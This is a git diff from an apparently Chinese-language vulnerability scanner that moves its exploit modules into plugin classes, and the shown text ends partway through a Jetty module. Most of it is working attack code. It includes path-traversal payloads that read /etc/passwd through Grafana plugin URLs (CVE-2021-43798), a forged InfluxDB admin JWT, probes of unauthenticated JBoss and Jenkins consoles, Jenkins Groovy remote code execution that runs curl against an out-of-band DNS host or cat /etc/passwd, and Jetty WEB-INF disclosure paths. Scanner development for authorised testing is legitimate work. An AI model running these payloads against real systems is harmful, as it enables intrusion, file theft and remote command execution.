diff --git a/payloads/Grafana/cve_2021_43798.py b/payloads/Grafana/cve_2021_43798.py
deleted file mode 100644
index e126b6e..0000000
--- a/payloads/Grafana/cve_2021_43798.py
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2021_43798_payloads = [
-    {'path': 'public/plugins/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
-    {'path': 'public/plugins/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
-    {'path': 'public/plugins/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts'},
-    {'path': 'plugins/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
-    # {'path': '{}/../../../../../../../../../../../../../etc/passwd'},
-]
-
-# * 该漏洞是由插件模块引起的, 以下是一些常见的插件id
-cve_2021_43798_plugins = [
-    'alertlist',
-    'cloudwatch',
-    'dashlist',
-    'elasticsearch',
-    'graph',
-    'graphite',
-    'heatmap',
-    'influxdb',
-    'mysql',
-    'opentsdb',
-    'pluginlist',
-    'postgres',
-    'prometheus',
-    'stackdriver',
-    'table',
-    'text'
-]
-
-# def quit(signum, frame):
-#     raise KeyboardInterrupt
-
-def cve_2021_43798_scan(clients):
-    ''' 2021年12月, 一位Twitter用户披露了一个0day漏洞, 
-        未经身份验证的攻击者可以利用该漏洞通过 Grafana 8.x 的插件url来遍历web路径并下载任意文件
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Grafana',
-        'vul_type': 'File-Read',
-        'vul_id': 'CVE-2021-43798',
-    }
-    
-    for payload in cve_2021_43798_payloads:
-        for plugin in cve_2021_43798_plugins:
-            path = payload['path'].format(PLUGIN=plugin)
-
-            res = client.request(
-                'get',
-                path,
-                allow_redirects=False,
-                vul_info=vul_info
-            )
-            if res is None:
-                continue
-
-            if (check.check_res_fileread(res.text)):
-                results = {
-                    'Target': res.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request': res
-                }
-                return results
-    return None
diff --git a/payloads/Grafana/grafana-cve-2021-43798-fileread.py b/payloads/Grafana/grafana-cve-2021-43798-fileread.py
new file mode 100644
index 0000000..8c317d4
--- /dev/null
+++ b/payloads/Grafana/grafana-cve-2021-43798-fileread.py
@@ -0,0 +1,81 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Grafana 8.x 插件模块文件路径遍历
+    CVE-2021-43798
+        Payload: https://vulhub.org/#/environments/grafana/CVE-2021-43798/
+
+2021年12月, 一位Twitter用户披露了一个0day漏洞, 
+    未经身份验证的攻击者可以利用该漏洞通过 Grafana 8.x 的插件url来遍历web路径并下载任意文件
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'public/plugins/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
+            {'path': 'public/plugins/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
+            {'path': 'public/plugins/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts'},
+            {'path': 'plugins/{PLUGIN}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
+            # {'path': '{}/../../../../../../../../../../../../../etc/passwd'},
+        ]
+
+        # * 该漏洞是由插件模块引起的, 以下是一些常见的插件id
+        self.cve_2021_43798_plugins = [
+            'alertlist',
+            'cloudwatch',
+            'dashlist',
+            'elasticsearch',
+            'graph',
+            'graphite',
+            'heatmap',
+            'influxdb',
+            'mysql',
+            'opentsdb',
+            'pluginlist',
+            'postgres',
+            'prometheus',
+            'stackdriver',
+            'table',
+            'text'
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Grafana',
+            'vul_type': 'File-Read',
+            'vul_id': 'CVE-2021-43798',
+        }
+        
+        for payload in self.payloads:
+            for plugin in self.cve_2021_43798_plugins:
+                path = payload['path'].format(PLUGIN=plugin)
+
+                res = client.request(
+                    'get',
+                    path,
+                    allow_redirects=False,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+
+                if (check.check_res_fileread(res.text)):
+                    results = {
+                        'Target': res.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Grafana/main.py b/payloads/Grafana/main.py
deleted file mode 100644
index 04f9827..0000000
--- a/payloads/Grafana/main.py
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-''' # ! 由于该POC数据包过多, 只有在指纹识别为Grafana时才会进行扫描, 否则vulcat不会使用该POC
-
-    Grafana扫描类: 
-        Grafana 8.x 插件模块文件路径遍历
-            CVE-2021-43798
-                Payload: https://vulhub.org/#/environments/grafana/CVE-2021-43798/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Grafana.cve_2021_43798 import cve_2021_43798_scan
-
-class Grafana():
-    def __init__(self):
-        self.app_name = 'Grafana'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2021_43798_scan, clients=clients)
-        ]
-
-grafana = Grafana()
diff --git a/payloads/Influxdb/influxdb-unauth.py b/payloads/Influxdb/influxdb-unauth.py
new file mode 100644
index 0000000..148127c
--- /dev/null
+++ b/payloads/Influxdb/influxdb-unauth.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+influxdb是一款著名的时序数据库
+    influxdb 未授权访问
+        暂无编号
+            Payload: https://vulhub.org/#/environments/influxdb/unacc/
+
+其使用jwt作为鉴权方式
+    在用户开启了认证, 但未设置参数shared-secret的情况下, jwt的认证密钥为空字符串,
+    此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'query',
+                'data': 'db=sample&q=show+users',
+                'headers': {'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo2NjY2NjY2NjY2fQ.XVfnw6S7uq4i9_RraPztULowgOlKLkX60MYcXWZbot0'}
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'influxdb',
+            'vul_type': 'unAuth',
+            'vul_id': 'influxdb-unAuthorized',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+            headers = payload['headers']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('results' in res.text)
+                and ('statement_id' in res.text)
+                and ('series' in res.text)
+                and ('columns' in res.text)
+                and ('user' in res.text)
+                and ('admin' in res.text)
+                and ('values' in res.text)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Influxdb/main.py b/payloads/Influxdb/main.py
deleted file mode 100644
index 108a2a8..0000000
--- a/payloads/Influxdb/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-influxdb是一款著名的时序数据库
-    influxdb扫描类: 
-        influxdb 未授权访问
-            暂无编号
-                Payload: https://vulhub.org/#/environments/influxdb/unacc/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Influxdb.unauth import unauth_scan
-
-class Influxdb():
-    def __init__(self):
-        self.app_name = 'influxdb'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=unauth_scan, clients=clients)
-        ]
-
-influxdb = Influxdb()
diff --git a/payloads/Influxdb/unauth.py b/payloads/Influxdb/unauth.py
deleted file mode 100644
index 307991f..0000000
--- a/payloads/Influxdb/unauth.py
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-influxdb_unauthorized_payloads = [
-    {
-        'path': 'query',
-        'data': 'db=sample&q=show+users',
-        'headers': {'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo2NjY2NjY2NjY2fQ.XVfnw6S7uq4i9_RraPztULowgOlKLkX60MYcXWZbot0'}
-    },
-]
-
-def unauth_scan(clients):
-    ''' 其使用jwt作为鉴权方式。在用户开启了认证, 但未设置参数shared-secret的情况下, jwt的认证密钥为空字符串, 此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'influxdb',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'influxdb-unAuthorized',
-    }
-
-    for payload in influxdb_unauthorized_payloads:
-        path = payload['path']
-        data = payload['data']
-        headers = payload['headers']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('results' in res.text)
-            and ('statement_id' in res.text)
-            and ('series' in res.text)
-            and ('columns' in res.text)
-            and ('user' in res.text)
-            and ('admin' in res.text)
-            and ('values' in res.text)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/JBoss/jboss-unauth.py b/payloads/JBoss/jboss-unauth.py
new file mode 100644
index 0000000..039cba6
--- /dev/null
+++ b/payloads/JBoss/jboss-unauth.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+JBOSS未授权访问
+    暂无编号
+        Payload: https://codeantenna.com/a/vUzclyNJBg
+
+在默认情况下 无需账密就可以直接访问管理控制台
+    进而导致网站信息泄露、服务器被上传shell等，最终网站被攻陷
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': ''},
+            {'path': 'jmx-console/'},
+            {'path': 'web-console/'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'JBoss',
+            'vul_type': 'unAuth',
+            'vul_id': 'jboss-unauthorized',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('JBoss Management' in res.text
+                    and '<li><a href="/jmx-console/">JMX Console</a></li>' in res.text
+                    and '<li><a href="/web-console/">JBoss Web Console</a></li>' in res.text)
+                
+                # * jxm-console/
+                or ('<title>JBoss JMX Management Console</title>' in res.text
+                    and 'ObjectName Filter' in res.text
+                    and '<h2 class=\'DomainName\'>JMImplementation</h2>' in res.text
+                )
+                
+                # * web-console/
+                or ('<title>Administration Console</title>' in res.text
+                    and '<frame id="right" name="right" src="ServerInfo.jsp" >' in res.text
+                    and '<p>Please use a frame-capable browser.</p>' in res.text
+                )
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Vuln-Tool': 'https://github.com/joaomatosf/jexboss',
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/JBoss/main.py b/payloads/JBoss/main.py
deleted file mode 100644
index 08c3e80..0000000
--- a/payloads/JBoss/main.py
+++ /dev/null
@@ -1,37 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-JBoss是一个基于J2EE的开放源代码的应用服务器，代码遵循LGPL许可可以在任何商业应用中免费使用
-JBoss是一个管理EJB的容器和服务器，支持EJB 1.1、EJB 2.0和EJB3的规范，
-但JBoss核心服务不包括支持servlet/JSP的WEB容器，一般与Tomcat或Jetty绑定使用
-
-    JBoss扫描类: 
-        1. JBOSS未授权访问
-            暂无编号
-                Payload: https://codeantenna.com/a/vUzclyNJBg
-
-
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.JBoss.unauth import unauth_scan
-
-class JBoss():
-    def __init__(self):
-        self.app_name = 'JBoss'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=unauth_scan, clients=clients)
-        ]
-
-jboss = JBoss()
diff --git a/payloads/JBoss/unauth.py b/payloads/JBoss/unauth.py
deleted file mode 100644
index 2acae4b..0000000
--- a/payloads/JBoss/unauth.py
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-jboss_unauthorized_payloads = [
-    {'path': ''},
-    {'path': 'jmx-console/'},
-    {'path': 'web-console/'},
-]
-
-def unauth_scan(clients):
-    ''' 在默认情况下 无需账密就可以直接访问管理控制台
-            进而导致网站信息泄露、服务器被上传shell等，最终网站被攻陷
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'JBoss',
-        'vul_type': 'unAuth',
-        'vul_id': 'jboss-unauthorized',
-    }
-
-    for payload in jboss_unauthorized_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('JBoss Management' in res.text
-                and '<li><a href="/jmx-console/">JMX Console</a></li>' in res.text
-                and '<li><a href="/web-console/">JBoss Web Console</a></li>' in res.text)
-            
-            # * jxm-console/
-            or ('<title>JBoss JMX Management Console</title>' in res.text
-                and 'ObjectName Filter' in res.text
-                and '<h2 class=\'DomainName\'>JMImplementation</h2>' in res.text
-            )
-            
-            # * web-console/
-            or ('<title>Administration Console</title>' in res.text
-                and '<frame id="right" name="right" src="ServerInfo.jsp" >' in res.text
-                and '<p>Please use a frame-capable browser.</p>' in res.text
-            )
-        ):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Vuln-Tool': 'https://github.com/joaomatosf/jexboss',
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Jenkins/cve_2018_1000861.py b/payloads/Jenkins/cve_2018_1000861.py
deleted file mode 100644
index 33906c2..0000000
--- a/payloads/Jenkins/cve_2018_1000861.py
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2018_1000861_payloads = [
-    {'path': 'securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl DNSDOMAIN".execute()}}'},
-    {'path': 'user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl DNSDOMAIN".execute()}}'},
-    {'path': 'admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl DNSDOMAIN".execute()}}'},
-    {'path': 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl DNSDOMAIN".execute()}}'}
-]
-    
-def cve_2018_1000861_scan(clients):
-    ''' Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误
-            检查操作是没有沙盒的, 攻击者可以通过Meta-Programming的方式, 在检查这个步骤时执行任意命令
-    '''
-    client = clients.get('reqClient')
-    sessid = 'ae9b030320374b97c35d76dfbe5c5eb6'
-
-    vul_info = {
-        'app_name': 'Jenkins',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2018-1000861',
-    }
-
-    headers = {
-        'Origin': client.protocol_domain,
-        'Referer': client.protocol_domain,
-    }
-
-    for payload in cve_2018_1000861_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path'].replace('DNSDOMAIN', dns_domain) # * Path
-
-        res = client.request(
-            'get',
-            path,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Jenkins/jenkins-cve-2018-1000861-rce.py b/payloads/Jenkins/jenkins-cve-2018-1000861-rce.py
new file mode 100644
index 0000000..a75040a
--- /dev/null
+++ b/payloads/Jenkins/jenkins-cve-2018-1000861-rce.py
@@ -0,0 +1,69 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+jenkins 远程命令执行
+    CVE-2018-1000861
+        Payload: https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/
+
+Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误
+    检查操作是没有沙盒的, 攻击者可以通过Meta-Programming的方式, 在检查这个步骤时执行任意命令
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl DNSDOMAIN".execute()}}'},
+            {'path': 'user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl DNSDOMAIN".execute()}}'},
+            {'path': 'admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl DNSDOMAIN".execute()}}'},
+            {'path': 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl DNSDOMAIN".execute()}}'}
+        ]
+
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = 'ae9b030320374b97c35d76dfbe5c5eb6'
+
+        vul_info = {
+            'app_name': 'Jenkins',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2018-1000861',
+        }
+
+        headers = {
+            'Origin': client.protocol_domain,
+            'Referer': client.protocol_domain,
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path'].replace('DNSDOMAIN', dns_domain) # * Path
+
+            res = client.request(
+                'get',
+                path,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Jenkins/jenkins-unauth.py b/payloads/Jenkins/jenkins-unauth.py
new file mode 100644
index 0000000..f1e97cc
--- /dev/null
+++ b/payloads/Jenkins/jenkins-unauth.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+jenkins 未授权访问
+    暂无编号
+        Payload: https://blog.csdn.net/weixin_40412037/article/details/120369441
+
+默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令
+    攻击者可通过未授权访问漏洞
+    或者暴力破解用户密码等进入后台管理服务
+    通过脚本执行界面从而获取服务器权限
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'script',
+                'data': '''script=println 'RCECOMMAND'.execute().text&json={"script": "println 'RCECOMMAND'.execute().text", "": "println 'RCECOMMAND'.execute().text"}'''
+            },
+            {
+                'path': '',
+                'data': '''script=println 'RCECOMMAND'.execute().text&json={"script": "println 'RCECOMMAND'.execute().text", "": "println 'RCECOMMAND'.execute().text"}'''
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Jenkins',
+            'vul_type': 'unAuth/RCE',
+            'vul_id': 'jenkins-unauthorized',
+        }
+        
+        headers = {
+            'Origin': client.protocol_domain,
+            'Referer': client.protocol_domain,
+        }
+        
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data'].replace('RCECOMMAND', 'cat /etc/passwd')
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Jenkins/main.py b/payloads/Jenkins/main.py
deleted file mode 100644
index db4b124..0000000
--- a/payloads/Jenkins/main.py
+++ /dev/null
@@ -1,39 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Jenkins是一个开源的持续集成的服务器, 用于监控持续重复的工作, 旨在提供一个开放易用的软件平台, 使软件的持续集成变成可能
-    Jenkins扫描类: 
-        1. jenkins 远程命令执行
-            CVE-2018-1000861
-
-        2. jenkins 未授权访问
-            暂无编号
-                Payload: https://blog.csdn.net/weixin_40412037/article/details/120369441
-
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-file:///C:/Windows/System32/drivers/etc/hosts
-'''
-
-from lib.initial.config import config
-from lib.tool.md5 import md5, random_md5
-from lib.tool.thread import thread
-from payloads.Jenkins.cve_2018_1000861 import cve_2018_1000861_scan
-from payloads.Jenkins.unauth import unauth_scan
-
-class Jenkins():
-    def __init__(self):
-        self.app_name = 'Jenkins'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2018_1000861_scan, clients=clients),
-            thread(target=unauth_scan, clients=clients),
-        ]
-
-jenkins = Jenkins()
diff --git a/payloads/Jenkins/unauth.py b/payloads/Jenkins/unauth.py
deleted file mode 100644
index 27def3a..0000000
--- a/payloads/Jenkins/unauth.py
+++ /dev/null
@@ -1,58 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import md5, random_md5, random_int_1, random_int_2
-from lib.tool import check
-
-jenkins_unauthorized_payloads = [
-    {
-        'path': 'script',
-        'data': '''script=println 'RCECOMMAND'.execute().text&json={"script": "println 'RCECOMMAND'.execute().text", "": "println 'RCECOMMAND'.execute().text"}'''
-    },
-    {
-        'path': '',
-        'data': '''script=println 'RCECOMMAND'.execute().text&json={"script": "println 'RCECOMMAND'.execute().text", "": "println 'RCECOMMAND'.execute().text"}'''
-    },
-]
-
-def unauth_scan(clients):
-    ''' 默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令
-            攻击者可通过未授权访问漏洞
-            或者暴力破解用户密码等进入后台管理服务
-        通过脚本执行界面从而获取服务器权限
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Jenkins',
-        'vul_type': 'unAuth/RCE',
-        'vul_id': 'jenkins-unauthorized',
-    }
-    
-    headers = {
-        'Origin': client.protocol_domain,
-        'Referer': client.protocol_domain,
-    }
-    
-    for payload in jenkins_unauthorized_payloads:
-        path = payload['path']
-        data = payload['data'].replace('RCECOMMAND', 'cat /etc/passwd')
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Jetty/cve_2021_28164.py b/payloads/Jetty/cve_2021_28164.py
deleted file mode 100644
index 496296b..0000000
--- a/payloads/Jetty/cve_2021_28164.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-cve_2021_28164_payloads = [
-    {'path': '%2e/WEB-INF/web.xml'},
-    {'path': '%2e%2e/WEB-INF/web.xml'},
-]
-
-def cve_2021_28164_scan(clients):
-    ''' 默认允许请求的url中包含%2e或者%2e%2e以访问 WEB-INF 目录中的受保护资源
-        例如请求 /context/%2e/WEB-INF/web.xml可以检索 web.xml 文件
-    '''
-    hackClient = clients.get('hackClient')
-    
-    vul_info = {
-        'app_name': 'Jetty',
-        'vul_type': 'DSinfo',
-        'vul_id': 'CVE-2021-28164',
-    }
-    
-    for payload in cve_2021_28164_payloads:
-        path = payload['path']
-
-        res = hackClient.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('<web-app>' in res.text)
-            and ('<display-name>' in res.text)
-            and ('<!DOCTYPE web-app PUBLIC' in res.text)
-            and ('Sun Microsystems' in res.text)
-            and ('DTD Web Application' in res.text)
-        ):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Jetty/cve_2021_28169.py b/payloads/Jetty/cve_2021_28169.py
deleted file mode 100644
index 653541a..0000000
--- a/payloads/Jetty/cve_2021_28169.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-cve_2021_28169_payloads = [
-    {'path': 'static?/%2557EB-INF/web.xml'},
-    {'path': 'concat?/%2557EB-INF/web.xml'},
-    {'path': '?/%2557EB-INF/web.xml'},
-]
-
-def cve_2021_28169_scan(clients):
-    ''' 在版本9.4.40、10.0.2、11.0.2 之前, ConcatServlet和WelcomeFilterJetty Servlet中的类受到"双重解码"错误的影响 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Jetty',
-        'vul_type': 'DSinfo',
-        'vul_id': 'CVE-2021-28169',
-    }
-
-    for payload in cve_2021_28169_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('<web-app>' in res.text)
-            and ('<display-name>' in res.text)
-            and ('<!DOCTYPE web-app PUBLIC' in res.text)
-            and ('Sun Microsystems' in res.text)
-            and ('DTD Web Application' in res.text)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Jetty/cve_2021_34429.py b/payloads/Jetty/cve_2021_34429.py
deleted file mode 100644
index 5dc5925..0000000
--- a/payloads/Jetty/cve_2021_34429.py
+++ /dev/null
@@ -1,47 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-cve_2021_34429_payloads = [
-    {'path': '%u002e/WEB-INF/web.xml'},
-    {'path': '.%00/WEB-INF/web.xml'},
